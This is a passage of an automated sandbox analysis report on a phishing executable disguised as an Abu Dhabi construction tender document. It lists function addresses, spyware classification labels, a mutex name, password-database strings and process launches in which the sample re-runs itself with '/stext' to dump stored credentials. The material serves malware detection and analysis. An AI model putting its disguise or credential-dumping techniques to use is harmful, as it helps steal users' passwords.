              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00446D305_2_00446D30
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00446D8B5_2_00446D8B
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00406E8F5_2_00406E8F
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004050386_2_00405038
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0041208C6_2_0041208C
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004050A96_2_004050A9
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0040511A6_2_0040511A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0043C13A6_2_0043C13A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004051AB6_2_004051AB
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004493006_2_00449300
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0040D3226_2_0040D322
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0044A4F06_2_0044A4F0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0043A5AB6_2_0043A5AB
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004136316_2_00413631
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004466906_2_00446690
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0044A7306_2_0044A730
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004398D86_2_004398D8
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004498E06_2_004498E0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0044A8866_2_0044A886
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0043DA096_2_0043DA09
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00438D5E6_2_00438D5E
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00449ED06_2_00449ED0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0041FE836_2_0041FE83
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00430F546_2_00430F54
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004050C27_2_004050C2
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004014AB7_2_004014AB
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004051337_2_00405133
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004051A47_2_004051A4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004012467_2_00401246
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_0040CA467_2_0040CA46
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004052357_2_00405235
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004032C87_2_004032C8
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004222D97_2_004222D9
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004016897_2_00401689
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00402F607_2_00402F60
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: String function: 00402B3A appears 49 times
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000000.00000000.1693249370.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2197957468.0000000032C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2201620011.000000000247A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2224697447.000000000249D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000000.1961768711.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000003.2224617970.000000000249A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.000000003329B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeBinary or memory string: OriginalFileName vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000000.2201806591.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000006.00000000.2202013252.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeBinary or memory string: OriginalFilename vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000000.2203046854.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004182CE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,7_2_00410DE1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_00404635
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00413D4C
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_0040206A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,5_2_0040B58D
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].jsonJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: C:\Users\user\AppData\Local\Temp\nsk7B8E.tmpJump to behavior
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967335152.0000000033190000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221996854.000000000276A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeReversingLabs: Detection: 21%
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile read: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_6-32983
              Source: unknownProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\zmfiflhnvmtjoudzbkcxkyywgeg"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\jokafdshjuloyardsuwyvdtnhlpesm"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\zmfiflhnvmtjoudzbkcxkyywgeg"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\jokafdshjuloyardsuwyvdtnhlpesm"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
